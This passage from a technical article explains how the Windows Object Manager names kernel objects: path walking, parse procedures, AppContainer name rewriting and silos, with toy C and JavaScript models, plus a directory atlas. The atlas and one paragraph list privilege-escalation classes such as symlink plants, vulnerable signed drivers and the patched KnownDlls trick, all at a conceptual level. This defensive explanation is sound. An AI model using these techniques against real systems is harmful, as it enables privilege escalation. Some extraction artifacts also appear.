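The three-case walk can be sketched in C under stated simplifications: a linear scan stands in for the 37-bucket lookup, `K_DEVICE` nodes stand in for any type with a `ParseProcedure`, symbolic-link targets are absolute and the walk restarts from the root after a substitution, and the 16-reparse cap is hypothetical. `Node`, `find_child`, and `walk` are illustrative names, not kernel symbols.

```c
#include <stdio.h>
#include <string.h>

typedef enum {
    K_DIRECTORY, /* OBJECT_DIRECTORY: keep walking */
    K_SYMLINK,   /* SymbolicLink: substitute and re-walk */
    K_DEVICE,    /* any type with a ParseProcedure: hand off */
    K_LEAF       /* any other named object */
} Kind;

typedef struct Node {
    const char *name;
    Kind kind;
    const char *link_target;            /* K_SYMLINK only: absolute path */
    const struct Node *const *children; /* K_DIRECTORY only, NULL-terminated */
} Node;

/* Linear scan standing in for the 37-bucket hash lookup. */
static const Node *find_child(const Node *dir, const char *name, size_t len) {
    for (const Node *const *c = dir->children; c && *c; c++)
        if (strlen((*c)->name) == len && strncmp((*c)->name, name, len) == 0)
            return *c;
    return NULL;
}

/* Walks `path` from `root` and describes the outcome in `out`.
   Returns 0 on success, -1 if a name is missing or reparsing never settles. */
static int walk(const Node *root, const char *path, char *out, size_t cap) {
    char buf[256];
    snprintf(buf, sizeof buf, "%s", path);
    for (int reparse = 0; reparse < 16; reparse++) {
        const Node *cur = root;
        const char *p = buf;
        for (;;) {
            while (*p == '\\') p++;
            if (*p == '\0') {                      /* path fully consumed */
                snprintf(out, cap, "object %s", cur->name);
                return 0;
            }
            if (cur->kind != K_DIRECTORY) return -1;
            size_t len = strcspn(p, "\\");
            const Node *child = find_child(cur, p, len);
            if (child == NULL) return -1;          /* name not found */
            p += len;
            if (child->kind == K_SYMLINK) {        /* case 2: substitute, restart */
                char next[256];
                snprintf(next, sizeof next, "%s%s", child->link_target, p);
                snprintf(buf, sizeof buf, "%s", next);
                break;
            }
            if (child->kind == K_DEVICE) {         /* case 3: parse-procedure handoff */
                snprintf(out, cap, "parse(%s, \"%s\")", child->name, p);
                return 0;
            }
            cur = child;                           /* case 1: ordinary step down */
        }
    }
    return -1;
}
```

Walking `\GLOBAL??\C:\Users\me\file.txt` against a tree where `C:` links to `\Device\HarddiskVolume1` takes all three branches in turn: two directory steps, one substitution, and a final handoff that passes `\Users\me\file.txt` to the device's parse procedure.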

The load-bearing method pointer on each `OBJECT_TYPE`'s `TypeInfo` field. When `ObpLookupObjectName` encounters an object whose type defines a `ParseProcedure`, the residual path is handed to that procedure for resolution. The two canonical parse procedures are `IopParseDevice` (for the `Device` type, which delegates further resolution to the device's owning driver via `IRP_MJ_CREATE`) and `CmpParseKey` (for the `Key` type, which walks the registry hive).

IopParseDevice is the parse procedure for the Device type. When the walker reaches \Device\HarddiskVolume1 and is asked to continue with \Users\me\file.txt, the I/O Manager allocates a FILE_OBJECT, builds an IRP_MJ_CREATE packet, dispatches it to the filesystem driver that owns the volume (NTFS, ReFS, exFAT, FAT32, or one of several others), and lets that driver walk the rest of the path inside its own on-disk structures. When the driver completes the IRP successfully, the Object Manager packages the FILE_OBJECT into a handle.

CmpParseKey is the parse procedure for the Key type. When the walker reaches \REGISTRY and is asked to continue with \MACHINE\Software\Microsoft\Windows, the Configuration Manager takes over and walks the in-memory hive structures.

The structural consequence is profound. Every named file in Windows is, technically, a leaf in the Object Manager namespace. NTFS, ReFS, exFAT, and the registry are not separate naming systems; they are parse-procedure callbacks that hand FILE_OBJECT or KEY bodies back to the OM.

sequenceDiagram
    participant User as User Process
    participant OM as ObpLookupObjectName
    participant Dir as \GLOBAL?? OBJECT_DIRECTORY
    participant Dev as \Device\HarddiskVolume1 (Device type)
    participant Drv as NTFS Driver
    User->>OM: NtCreateFile("\??\C:\Users\me\file.txt")
    OM->>OM: rewrite \??\ -> \Sessions\\DosDevices\
    OM->>Dir: lookup "C:"
    Dir-->>OM: SymbolicLink -> \Device\HarddiskVolume1
    OM->>OM: substitute, re-enter walk
    OM->>Dev: lookup \Device\HarddiskVolume1
    Dev-->>OM: type=Device, has ParseProcedure
    OM->>Drv: IopParseDevice with "\Users\me\file.txt"
    Drv->>Drv: IRP_MJ_CREATE: walk MFT, find file
    Drv-->>OM: FILE_OBJECT
    OM-->>User: HANDLE

5.4 The 37-bucket directory hash

OBJECT_DIRECTORY is a 37-bucket open-hash table. The hash function is RtlHashUnicodeString, applied to each component name. Thirty-seven was the prime Cutler picked in 1993; the constant has not changed in thirty-three years. The folk-knowledge corroboration is in the Object Manager chapter of Windows Internals 7th Edition (Chapter 8, in Part 2) and in Forshaw's Windows Security Internals Chapter 8; Microsoft has never published a Learn-hosted spec for the constant [@nostarch-windows-security-internals].
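A sketch of the bucket selection, assuming the x65599 recurrence (h = 65599 * h + c over upcased characters) that the `HASH_STRING_ALGORITHM_X65599` option of `RtlHashUnicodeString` is named for. Whether the Object Manager uses exactly this variant is an assumption, `directory_bucket` is a hypothetical helper, and the ASCII-only `upcase` simplifies the kernel's Unicode upcase table.

```c
#include <stddef.h>
#include <stdint.h>

#define NUMBER_HASH_BUCKETS 37

/* ASCII-only upcase; the kernel would use a full Unicode upcase table. */
static uint16_t upcase(uint16_t c) {
    return (c >= 'a' && c <= 'z') ? (uint16_t)(c - 'a' + 'A') : c;
}

/* Case-insensitive x65599 hash over a UTF-16 name, reduced modulo 37 to
   pick the OBJECT_DIRECTORY bucket whose chain is then searched. */
static unsigned directory_bucket(const uint16_t *name, size_t len) {
    uint32_t h = 0;
    for (size_t i = 0; i < len; i++)
        h = h * 65599u + upcase(name[i]);
    return (unsigned)(h % NUMBER_HASH_BUCKETS);
}
```

Load factor is the other half of the story: with, say, 300 entries in a single directory, 300 / 37 ≈ 8.1 names share each bucket on average, and every lookup walks part of that chain.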

The 37-bucket open-hash table (`nt!_OBJECT_DIRECTORY`) that lives at every interior node of the Object Manager tree. Keys are `UNICODE_STRING` component names; the hash is `RtlHashUnicodeString` modulo 37. Each bucket is a linked list of `OBJECT_DIRECTORY_ENTRY` records that point at the next-level `OBJECT_HEADER`. Reading the tree requires `Directory`-`TRAVERSE` rights on the parent.

On a 2026 Windows 11 25H2 box with several hundred MSIX packages, each owning an \AppContainerNamedObjects\<package-sid>\ subtree, the directory that holds those per-package entries spreads several hundred names over the same 37 buckets, so average bucket chains run several entries deep. Collision pressure on the 1993 constant is the open problem returned to in Section 9.

5.5 The lowbox redirect inside ObpLookupObjectName

This is the subsection that earns the second aha moment of the article.

When the calling thread's primary token is a lowbox token, ObpLookupObjectName consults the token's AppContainerNumber and package SID before it begins the walk. Lookups that would otherwise resolve into \BaseNamedObjects or \RPC Control are rewritten into \Sessions\<n>\AppContainerNamedObjects\<package-sid>\. The rewrite happens transparently to the user-mode Win32 caller, which still thinks it asked for \BaseNamedObjects\X.

A specialised token type produced by `NtCreateLowBoxToken` that carries a `TOKEN_APPCONTAINER_INFORMATION` block (with a package SID `S-1-15-2-...` and an `AppContainerNumber`). When a process runs under a lowbox token, `ObpLookupObjectName` rewrites every named-object lookup into the per-package directory `\Sessions\\AppContainerNamedObjects\\` before path walking begins.

The user-facing brand for the lowbox-token mechanism. Every UWP / MSIX / Windows Store app runs in an AppContainer. The Windows API surface is unchanged for the app; the Object Manager rewrites every named-object name into a per-package subtree, gating cross-package coordination at the namespace layer. The Microsoft Learn page describes this as "Sandboxing the application kernel objects, the AppContainer environment prevents the application from influencing, or being influenced by, other application processes" [@ms-appcontainer-isolation].

The aha moment is structural. AppContainer is not a containment mechanism the way you might first picture it. It is a name-translation mechanism. The lowbox token tells the kernel which directory to rewrite every name into; the sandbox is, at root, a hash-table indirection inside the kernel's path-walk function. The Edge renderer process cannot name \BaseNamedObjects\GlobalEvent_Foo because the kernel rewrites that name into \Sessions\1\AppContainerNamedObjects\S-1-15-2-...\Global\GlobalEvent_Foo before lookup even begins. The "sandbox" is a hash-table redirect.
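Because the sandbox is a rewrite, it fits in a few lines. This is a hypothetical model of the behaviour described in this subsection, not kernel code: `SketchToken` holds only what the rewrite needs, the package SID in the usage is shortened for readability, and both rewritable roots are mapped into the same per-package directory, as the prose describes.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical token view: only the fields the rewrite needs. */
typedef struct {
    int is_lowbox;
    unsigned session;
    const char *package_sid; /* "S-1-15-2-..." in a real lowbox token */
} SketchToken;

static const char *const kRewritable[] = { "\\BaseNamedObjects\\", "\\RPC Control\\" };

/* Rewrites a path for a lowbox caller before any directory is walked;
   everyone else gets the path unchanged. Returns 0 on success. */
static int lowbox_rewrite(const SketchToken *tok, const char *path, char *out, size_t cap) {
    if (tok->is_lowbox) {
        for (size_t i = 0; i < sizeof kRewritable / sizeof kRewritable[0]; i++) {
            size_t len = strlen(kRewritable[i]);
            if (strncmp(path, kRewritable[i], len) != 0) continue;
            int w = snprintf(out, cap, "\\Sessions\\%u\\AppContainerNamedObjects\\%s\\%s",
                             tok->session, tok->package_sid, path + len);
            return (w >= 0 && (size_t)w < cap) ? 0 : -1;
        }
    }
    int w = snprintf(out, cap, "%s", path); /* not lowbox, or not a rewritable root */
    return (w >= 0 && (size_t)w < cap) ? 0 : -1;
}
```

Two tokens asking for the same name get two different answers, and neither caller can observe that a rewrite happened; that is the whole isolation property in this model.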

5.6 The Silo OBJECT_TYPE and silo-scoped views

Silo is itself a registered OBJECT_TYPE. Each silo instance carries a silo-scoped RootDirectory, DosDevicesDirectory, and ServerSiloGlobals (with the silo's own registry-hive root and per-silo BaseNamedObjects root). PsAttachSiloToCurrentThread switches the thread's namespace view; once attached, every Object Manager lookup runs through the silo's roots instead of the host's. Job objects, which provide the cgroups-equivalent resource-accounting substrate, are the underlying primitive the Silo type extends [@ms-job-objects]. The structural design history is in Prizmant's reverse-engineering writeup [@unit42-rev-eng-windows-containers].
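A thread's silo attachment changes where every absolute lookup starts. The sketch models that as prefixing the silo's root path; `SketchSilo`, `SketchThread`, `effective_path`, and the `\Silos\1234` root name used in the usage are hypothetical, and the real kernel starts the walk at the silo's root directory object rather than concatenating strings.

```c
#include <stdio.h>

typedef struct {
    const char *root_directory; /* the silo's own "\" */
} SketchSilo;

typedef struct {
    const SketchSilo *attached_silo; /* NULL for an ordinary host thread */
} SketchThread;

/* Where an absolute lookup issued by thread `t` effectively begins. */
static int effective_path(const SketchThread *t, const char *path, char *out, size_t cap) {
    const char *root = t->attached_silo ? t->attached_silo->root_directory : "";
    int w = snprintf(out, cap, "%s%s", root, path);
    return (w >= 0 && (size_t)w < cap) ? 0 : -1;
}
```

The same `\GLOBAL??\C:` string therefore names the host's volume for one thread and the silo's volume for another, which is the behaviour the glossary entry below describes.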

A specialised `Job`-derived kernel object (`OBJECT_TYPE` Silo) introduced in Windows Server 2016 that carries silo-scoped `RootDirectory`, `DosDevicesDirectory`, and `ServerSiloGlobals` fields. A thread attached to a silo via `PsAttachSiloToCurrentThread` sees the silo's namespace as its root; the silo's `\GLOBAL??\C:` resolves to the silo's `\Device\HarddiskVolume*`, which is a different `Device` object from the host's. Server Silo is the substrate underneath Windows Server Containers and WSL1.

5.7 The Secure Kernel's parallel namespace

Inside VTL1, the Secure Kernel maintains a separate Object Manager tree with its own root, its own type registry, and its own handle-table machinery. The VTL0 NT kernel cannot enumerate this tree; the only cross-VTL traffic is the narrow ALPC interface each trustlet publishes. Ionescu's BH2015 inventory (Trustlet IDs 0 through 3 at ship, growing in subsequent releases) is the canonical primary [@ionescu-bh2015-pdf].

A user-mode process running in Isolated User Mode under the VTL1 Secure Kernel. Each trustlet is signed with both the Windows System Component Verification EKU (1.3.6.1.4.1.311.10.3.6) and the IUM EKU (1.3.6.1.4.1.311.10.3.37), runs at Signature Level 12, and is reachable from VTL0 only through narrow ALPC ports. LSAISO.EXE (Credential Guard), VMSP.EXE (virtual TPM host), and the vTPM provisioning trustlet are the inbox examples.

5.8 The handle table

The namespace is the name side; the per-process HANDLE_TABLE is the access side. Once a handle exists in a process, no name lookup happens on subsequent use; the kernel dereferences the handle through a three-level radix tree indexed by the 32-bit handle value, lands on an OBJECT_HEADER, and operates on the body. This is why ObRegisterCallbacks fires on handle creation and duplication rather than on every use, and why an inherited handle bypasses the callback entirely. The structural consequence -- that the Object Manager is the gate at name resolution but not at every operation -- comes back in Section 8.
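The handle-side lookup can be sketched as pure index arithmetic. This is a toy model under stated assumptions, not kernel code: it assumes the x64 layout as commonly described (handle values are multiples of four, a lowest-level page holds 256 sixteen-byte HANDLE_TABLE_ENTRY slots, a mid-level page holds 512 pointers), and `handleTableIndices` and `lookupHandle` are hypothetical names. What it illustrates is the point made above: resolving a handle never touches a name.

```javascript
// Toy three-level handle-table lookup. Layout constants are assumptions
// (x64: 4 KiB pages, 16-byte entries, 8-byte pointers), not kernel code.
const ENTRIES_PER_LOW_PAGE = 256; // 4096 / 16-byte HANDLE_TABLE_ENTRY
const POINTERS_PER_MID_PAGE = 512; // 4096 / 8-byte pointer

// Split a handle value into top / mid / low indices.
function handleTableIndices(handleValue) {
  const index = handleValue >>> 2; // drop the two low tag bits
  return {
    top: Math.floor(index / (ENTRIES_PER_LOW_PAGE * POINTERS_PER_MID_PAGE)),
    mid: Math.floor(index / ENTRIES_PER_LOW_PAGE) % POINTERS_PER_MID_PAGE,
    low: index % ENTRIES_PER_LOW_PAGE,
  };
}

// Resolve a handle to its entry by indexing alone: no name is looked up.
function lookupHandle(table, handleValue) {
  const { top, mid, low } = handleTableIndices(handleValue);
  const midPage = table[top];
  const lowPage = midPage ? midPage[mid] : undefined;
  return (lowPage && lowPage[low]) || null;
}

// Usage: one populated slot, reached by handle value 0x4 (index 1).
const demoLowPage = [];
demoLowPage[1] = { type: 'Event' }; // stands in for the OBJECT_HEADER pointer
const demoTable = [[demoLowPage]];
console.log(lookupHandle(demoTable, 0x4).type); // Event
console.log(handleTableIndices(0x400)); // { top: 0, mid: 1, low: 0 }
```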

Now you know the data structure. But what does the actual tree look like in 2026? What does \ contain on a Windows 11 25H2 box, and which security boundary lives in each top-level directory?

6. The 2026 top-level directory atlas

Open WinObj.exe as administrator on a Windows 11 25H2 machine and the root directory at \ carries roughly twenty entries. The table below catalogues the load-bearing ones. Each row names the directory, the security boundary it physically realises, and a representative exploit class that has been thrown at it. The driver kit's Object Directories reference [@ms-object-directories] is Microsoft's canonical inventory.

Top-level directory	What it contains	Which boundary it enforces	Exploit class
`\ObjectTypes`	The ~75 `OBJECT_TYPE` singletons (`Process`, `Thread`, `Section`, `Key`, `File`, `Token`, `Job`, `Silo`, etc.)	Meta -- the type registry the rest of the namespace depends on	Type confusion (mitigated by `ObHeaderCookie` since Windows 10 1709)
`\Device`	Driver-published device objects (`\Device\HarddiskVolume*`, `\Device\Tcp`, `\Device\Tpm`, `\Device\NamedPipe`, `\Device\Mailslot`, `\Device\Vmbus`, `\Device\KsecDD`, `\Device\CNG`)	The I/O Manager's surface; each driver's parse procedure consumes residual paths	Bait-and-switch on `\Device` (a low-privilege user redirects a privileged opener through a planted symbolic link)
`\Driver`, `\FileSystem`	Loaded `DRIVER_OBJECT` registries	KMCS / HVCI driver-load gate	Vulnerable signed-driver class (BYOVD)
`\GLOBAL??`	The machine-wide DosDevices view -- where `C:` and `D:` are symlinks to `\Device\HarddiskVolume*`	Cross-session drive-letter map	Symlink redirect across session boundary
`\??`	The per-session DosDevices alias, falling through to `\GLOBAL??`	Session-scoped drive-letter map	The HackSys / CVE-2023-35359 worked example: a low-privilege caller plants a `DefineDosDevice` remapping that survives into the impersonation-time `\??` view, and the SYSTEM-side activation-context resolver opens the redirected path
`\BaseNamedObjects`	The global / `Global\`-prefixed-only BNO	Cross-session named-object visibility	Pre-Vista squatting class (closed by Generation 2)
`\Sessions\<n>\`	Per-session subtrees (BNO, DosDevices, WindowStations, AppContainerNamedObjects)	Session boundary (Generation 2)	Shatter attacks (closed by Generation 2)
`\Sessions\<n>\AppContainerNamedObjects\<package-sid>\`	Per-package UWP / MSIX lowbox namespace	AppContainer / lowbox boundary (Generation 3)	Forshaw P0 Issue 1550 arbitrary-directory creation race
`\RPC Control`	Every named LRPC ALPC port (every COM call lands here)	RPC endpoint visibility	Endpoint squatting against named LRPC ports
`\KnownDlls`, `\KnownDlls32`	Pre-mapped `Section` objects for system DLLs	Loader supply-chain	`DefineDosDevice` + `\??` symlink-plant trick (closed in NTDLL July 2022, build 19044.1826)
`\KernelObjects`	System-defined events (`LowMemoryCondition`, `HighMemoryCondition`, etc.)	Kernel-internal visibility	None public
`\Callback`	System-defined `Callback` objects (`ExCallback` slots drivers register against)	Kernel API extension surface	Driver-callback abuse
`\Security`	LSA-private endpoints	LSA / authentication isolation	Credential theft (answered by the LSAISO trustlet, Generation 4)
`\Windows`	BNO-redirect surface and `SharedSection`	Win32 subsystem shared state	Cross-session Win32 state leakage
`\Silos\<id>`	Per-container silo subroots on Server SKUs	Server Silo boundary (Generation 5)	Siloscape -- symlink retarget out of the silo
`\BNOLINKS`	The boundary-keyed private-namespace index	`CreatePrivateNamespace` cross-session/cross-package IPC	None public; the directory itself is RE-derived

```mermaid
flowchart LR
    subgraph EdgeRenderer["Microsoft Edge Renderer (lowbox token)"]
        K32["CreateMutexW(L'Global\\Foo')"]
    end
    K32 -->|"NtCreateMutant, OBJECT_ATTRIBUTES"| OB
    subgraph KernelOb["ObpLookupObjectName"]
        OB["Read caller token<br/>token.AppContainerNumber<br/>token.PackageSid"]
        OB -->|"rewrite name"| RW["Rewrite '\\BaseNamedObjects\\Global\\Foo'<br/>to<br/>'\\Sessions\\1\\AppContainerNamedObjects\\<br/>S-1-15-2-...\\Global\\Foo'"]
        RW --> WALK["walk the rewritten path"]
    end
    WALK --> Dir["\\Sessions\\1\\AppContainerNamedObjects\\<br/>S-1-15-2-...\\Global\\<br/>(per-package OBJECT_DIRECTORY,<br/>DACL allows only package SID)"]
```
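The rewrite in the diagram above amounts to a string transformation keyed by the caller's token. The sketch below is a simplification, not the kernel's logic: it assumes only names under `\BaseNamedObjects` are rewritten, and the token fields (`isLowbox`, `sessionId`, `packageSid`) and the two package SIDs are hypothetical.

```javascript
// Toy model of the lowbox name rewrite. Assumptions: only names under
// \BaseNamedObjects are rewritten; token field names are hypothetical.
const BNO_PREFIX = '\\BaseNamedObjects\\';

function rewriteForLowbox(name, token) {
  // Non-lowbox callers, and names outside the BNO, pass through unchanged.
  if (!token.isLowbox || !name.startsWith(BNO_PREFIX)) return name;
  const rest = name.slice(BNO_PREFIX.length);
  return `\\Sessions\\${token.sessionId}\\AppContainerNamedObjects\\${token.packageSid}\\${rest}`;
}

// Hypothetical package SIDs for two apps in session 1, plus a desktop process.
const appA = { isLowbox: true, sessionId: 1, packageSid: 'S-1-15-2-111' };
const appB = { isLowbox: true, sessionId: 1, packageSid: 'S-1-15-2-222' };
const desktopApp = { isLowbox: false };

const requested = '\\BaseNamedObjects\\Global\\Foo';
console.log(rewriteForLowbox(requested, appA));
console.log(rewriteForLowbox(requested, appB));
console.log(rewriteForLowbox(requested, desktopApp));
```

The two lowbox callers ask for the same name and land in different per-package directories; the non-lowbox caller's name passes through untouched.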

The \BNOLINKS directory deserves a separate paragraph because it is not on Microsoft Learn. NtCreatePrivateNamespace is the kernel-side syscall behind the Win32 CreatePrivateNamespace API [@ms-createprivatenamespacew]; the caller passes a boundary descriptor built by CreateBoundaryDescriptor [@ms-createboundarydescriptorw] plus one or more SIDs added via AddSIDToBoundaryDescriptor [@ms-addsidtoboundarydescriptor]. The kernel materialises one \BNOLINKS entry per (alias_prefix, boundary_descriptor_hash) tuple; two callers that pass the same lpAliasPrefix but different boundary descriptors land on different directories. The native signature is documented in the PHNT-derived NtDoc mirror [@ntdoc-ntcreateprivatenamespace], and the OBJECT_BOUNDARY_DESCRIPTOR structure layout is at ntdoc.m417z.com/object_boundary_descriptor [@ntdoc-object-boundary-descriptor]. The Win32 Object Namespaces overview [@ms-object-namespaces] is Microsoft's only published user-mode reference; the \BNOLINKS directory name itself is reverse-engineering-derived.

Note: The \BNOLINKS directory is documented only through reverse engineering of ntoskrnl.exe -- via Forshaw's NtObjectManager and System Informer's PHNT headers -- not on Microsoft Learn. The user-mode API surface (CreatePrivateNamespace, CreateBoundaryDescriptor, AddSIDToBoundaryDescriptor) is fully documented. The provenance gap is worth flagging when you cite the directory by name.

The \KnownDlls LPE class targeted what was, for a decade, the canonical example of how a DACL plus loader-side validation could lock down a supply-chain anchor. Forshaw's August 2018 P0 post first sketched a DefineDosDevice + \?? symlink-plant chain that could land a forged Section object into \KnownDlls; Clément Labro (itm4n) implemented the attack as the PPLdump tool and wrote companion posts on both itm4n.github.io [@itm4n-lsass-runasppl] and the SCRT team blog [@blog-scrt-bypassing-lsa-protection-in-userland]. The class was closed in NTDLL by Windows 10 21H2 build 19044.1826; itm4n confirms the patch in The End of PPLdump [@itm4n-the-end-of-ppldump]: "A patch in NTDLL now prevents PPLs from loading Known DLLs."
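The \BNOLINKS keying rule described earlier in this section, one directory per alias prefix and boundary descriptor, can be illustrated with a map. This is a minimal sketch under loud assumptions: the boundary descriptor is modelled as a name plus an ordered SID list, the "hash" is a plain string key, and `createOrOpenPrivateNamespace` is a hypothetical create-or-open stand-in for the separate `CreatePrivateNamespace` / `OpenPrivateNamespace` calls.

```javascript
// Toy model of the \BNOLINKS keying rule. Assumptions: boundary = name + SID
// list, "hash" = string key; the kernel's real layout is not reproduced.
const bnoLinks = new Map();

function boundaryKey(boundary) {
  return `${boundary.name}|${boundary.sids.join(',')}`;
}

// Hypothetical create-or-open helper: one directory per (prefix, boundary) key.
function createOrOpenPrivateNamespace(aliasPrefix, boundary) {
  const key = `${aliasPrefix}#${boundaryKey(boundary)}`;
  if (!bnoLinks.has(key)) bnoLinks.set(key, { aliasPrefix, objects: new Map() });
  return bnoLinks.get(key);
}

const admins = { name: 'MyBoundary', sids: ['S-1-5-32-544'] }; // BUILTIN\Administrators
const users = { name: 'MyBoundary', sids: ['S-1-5-11'] }; // Authenticated Users

const nsAdmins = createOrOpenPrivateNamespace('MyApp', admins);
const nsUsers = createOrOpenPrivateNamespace('MyApp', users); // same prefix, different boundary
const nsAdminsAgain = createOrOpenPrivateNamespace('MyApp', admins);

console.log(nsAdmins === nsUsers); // false: different directories
console.log(nsAdmins === nsAdminsAgain); // true: same key, same directory
console.log(bnoLinks.size); // 2
```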

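```javascript
// Toy Object Manager path walk. Assumption: the hash is a simple case-insensitive
// multiply-by-31 stand-in, not the real RtlHashUnicodeString algorithm.
const MAX_DIRECTORY_BUCKETS = 37;

function rtlHashUnicodeString(name) {
  let h = 0;
  for (const ch of name.toUpperCase()) h = (h * 31 + ch.charCodeAt(0)) >>> 0;
  return h % MAX_DIRECTORY_BUCKETS;
}

const makeDir = () => ({ buckets: Array.from({ length: MAX_DIRECTORY_BUCKETS }, () => []) });
const addChild = (dir, name, child) => dir.buckets[rtlHashUnicodeString(name)].push({ name, child });

// One bucket lookup per component; a parse procedure takes over the residual path.
function lookupObjectName(path, root) {
  const parts = path.split('\\').filter(Boolean);
  let current = root;
  for (let i = 0; i < parts.length; i++) {
    if (current.parseProcedure) return { object: current, residual: '\\' + parts.slice(i).join('\\') };
    const chain = current.buckets ? current.buckets[rtlHashUnicodeString(parts[i])] : [];
    const hit = chain.find((e) => e.name.toUpperCase() === parts[i].toUpperCase());
    if (!hit) return null; // name not found
    current = hit.child;
  }
  return { object: current, residual: '' };
}

const root = makeDir();
const device = makeDir();
addChild(device, 'HarddiskVolume1', { type: 'Device', parseProcedure: 'IopParseDevice' });
addChild(root, 'Device', device);
addChild(root, 'Sessions', makeDir());
addChild(root, 'BaseNamedObjects', makeDir());

const result = lookupObjectName('\\Device\\HarddiskVolume1\\Users\\me\\file.txt', root);
console.log(result.object.type, result.residual); // Device \Users\me\file.txt
```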

The walk is the algorithm. The 37 is the bucket count Cutler picked in 1993. The parse-procedure handoff is where the I/O Manager and the Configuration Manager and dozens of other subsystems insert themselves into the tree. Now turn the question around: Windows bet on one tree. What did the kernels that did not bet on one tree do, and why?

7. How other kernels name kernel objects

Three kernels, three different bets. Linux took the namespace and split it into per-resource-class clones -- one for mounts, one for PIDs, one for IPC, one for the network stack, one for users, one for hostnames, one for cgroups, one for time -- and never built a unified tree. macOS / Darwin gave each task its own Mach port-right namespace and let launchd broker named-service lookups. Plan 9 from Bell Labs was the academic ancestor of "every named OS resource is a filesystem path," and the design Cutler imported into NT.

7.1 Linux: per-resource namespaces

Linux ships eight namespace types, each governed by a CLONE_NEW* flag passed to clone(), unshare(), or setns(): mount, PID, network, IPC, user, UTS, cgroup, and time. The namespaces(7) man page is precise: "A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource" [@man7-namespaces]. Docker, containerd, runc, Kubernetes pods, LXC, and systemd-nspawn all compose these eight flags into a Linux container.

The strength of the Linux design is per-class composability. A process can be in a fresh mount namespace, a fresh PID namespace, and the host's network namespace, all at once. The weakness is the absence of a unified type registry: Linux has no equivalent of \ObjectTypes, no equivalent of the OBJECT_HEADER reference counting that the kernel applies uniformly to every named object. Each resource class has its own lookup function, its own permission model, and its own ownership story. A bug in any one of them is confined to that resource class, but a mitigation applied to one class is not shared with the others either.
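The per-class composability can be sketched as eight independent slots, one per `CLONE_NEW*` flag. The flag values are the Linux `<sched.h>` constants; `cloneNamespaces` and the string namespace IDs are a hypothetical model that ignores privileges and the real `clone()` / `unshare()` semantics.

```javascript
// Toy model of per-resource namespace composition. CLONE_NEW* values are the
// Linux <sched.h> constants; everything else is a simplified stand-in.
const CLONE_NEWTIME = 0x00000080;
const CLONE_NEWNS = 0x00020000;
const CLONE_NEWCGROUP = 0x02000000;
const CLONE_NEWUTS = 0x04000000;
const CLONE_NEWIPC = 0x08000000;
const CLONE_NEWUSER = 0x10000000;
const CLONE_NEWPID = 0x20000000;
const CLONE_NEWNET = 0x40000000;

const KIND_FLAGS = {
  mnt: CLONE_NEWNS, pid: CLONE_NEWPID, net: CLONE_NEWNET, ipc: CLONE_NEWIPC,
  user: CLONE_NEWUSER, uts: CLONE_NEWUTS, cgroup: CLONE_NEWCGROUP, time: CLONE_NEWTIME,
};

let nextNamespaceId = 1;

// Each kind is an independent slot: a set flag gives the child a fresh
// namespace of that kind; a clear flag shares the parent's instance.
function cloneNamespaces(parentSet, flags) {
  const childSet = { ...parentSet };
  for (const [kind, flag] of Object.entries(KIND_FLAGS)) {
    if (flags & flag) childSet[kind] = `${kind}:${nextNamespaceId++}`;
  }
  return childSet;
}

const hostSet = Object.fromEntries(Object.keys(KIND_FLAGS).map((k) => [k, `${k}:host`]));
// Fresh mount and PID namespaces, host network namespace.
const containerSet = cloneNamespaces(hostSet, CLONE_NEWNS | CLONE_NEWPID);
console.log(containerSet);
```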

7.2 macOS / Darwin: Mach ports and the bootstrap server

Darwin's kernel-object naming is capability-style. Apple's archive documentation describes the model directly: "each task consists of a virtual address space, a port right namespace, and one or more threads" [@apple-mach-kernel]. Tasks send messages by holding a port right -- a per-task index into a kernel-managed table of Mach ports. There is no single hierarchical namespace; ports are sent over Mach messages, and launchd operates as the bootstrap-server name broker for services that need a stable rendezvous. A separate I/O Registry tree carries device objects.

The strength of the Mach design is that capabilities cannot be forged; you cannot synthesise a port right out of a string the way you can synthesise a path string under Windows. The weakness is the split namespace: device objects live in the I/O Registry, services live behind launchd, and the kernel itself has no equivalent of \BaseNamedObjects as a one-stop shop.
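The capability point can be made concrete with two per-task tables. In this toy model, which is an assumption-laden simplification rather than the Mach API, a port name is just an integer index local to one task, and the only way task B gains a right to A's port is an explicit transfer (standing in for a right carried in a Mach message). `Task`, `insertRight` and `transferRight` are hypothetical names.

```javascript
// Toy per-task port-right tables. Assumptions: names are small integers local
// to one task; transferRight() stands in for a right carried in a message.
const makePort = (label) => ({ label, queue: [] });

class Task {
  constructor(label) {
    this.label = label;
    this.rights = new Map(); // this task's name -> port table
    this.nextName = 1;
  }
  insertRight(port) {
    const name = this.nextName++;
    this.rights.set(name, port);
    return name; // meaningful only inside this task
  }
  send(name, msg) {
    const port = this.rights.get(name);
    if (!port) throw new Error(`${this.label}: no right named ${name}`);
    port.queue.push(msg);
  }
}

function transferRight(from, name, to) {
  const port = from.rights.get(name);
  if (!port) throw new Error(`${from.label}: no right named ${name}`);
  return to.insertRight(port); // the receiver gets its own, new name
}

const servicePort = makePort('service');
const ownPort = makePort('b-private');
const taskA = new Task('A');
const taskB = new Task('B');
const aName = taskA.insertRight(servicePort); // 1 in A
const bOwn = taskB.insertRight(ownPort); // also 1, but in B's table
taskB.send(aName, 'hello'); // integer 1 in B reaches ownPort, not servicePort
const bName = transferRight(taskA, aName, taskB); // 2 in B, now naming servicePort
taskB.send(bName, 'hello again');
console.log(ownPort.queue, servicePort.queue); // [ 'hello' ] [ 'hello again' ]
```

The same integer names different ports in A and B, which is why a name cannot be forged into a right: it means nothing outside the table that issued it.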

7.3 Plan 9 from Bell Labs

Plan 9 is the design lineage Cutler imported. In Plan 9, every named operating-system resource -- including processes, network connections, devices, and the window system -- surfaces as a path served over 9P. The single hierarchical namespace was the central claim. Plan 9 never reached commercial scale, but its design idea reached production in three places: NT (1993, via Cutler), Linux's /proc, /sys, and FUSE (the 1990s onward), and the various capability-OS research projects (KeyKOS, EROS, seL4) that took the lessons in a different direction.

Primitive	Granularity	Enforcement point	Structural / opt-in	Bypass by privilege	Inheritance gap
Per-Session (NT)	Logon session	`ObpLookupObjectName` + DACL	Structural	`SeDebugPrivilege` short-circuit	Inherited handles cross sessions
AppContainer Lowbox (NT)	Package SID	`ObpLookupObjectName` rewrite	Structural	TCB privileges only	Brokered handles enter
Server Silo (NT)	Container	Process->Silo indirection	Structural	KMCS-signed driver	Host handles cross silos
VBS / IUM Trustlet (NT)	Trust level (VTL)	Hypervisor	Structural	Hypervisor compromise	Cross-VTL ALPC only
